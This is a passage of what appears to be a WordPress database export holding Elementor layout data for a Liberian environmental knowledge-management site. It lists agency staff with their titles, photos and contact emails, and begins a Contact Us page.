href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24735,3663,'_elementor_edit_mode','builder'),(24736,3663,'_elementor_template_type','wp-page'),(24737,3663,'_elementor_version','3.0.16'),(24738,3663,'_wp_page_template','default'),(24739,3663,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 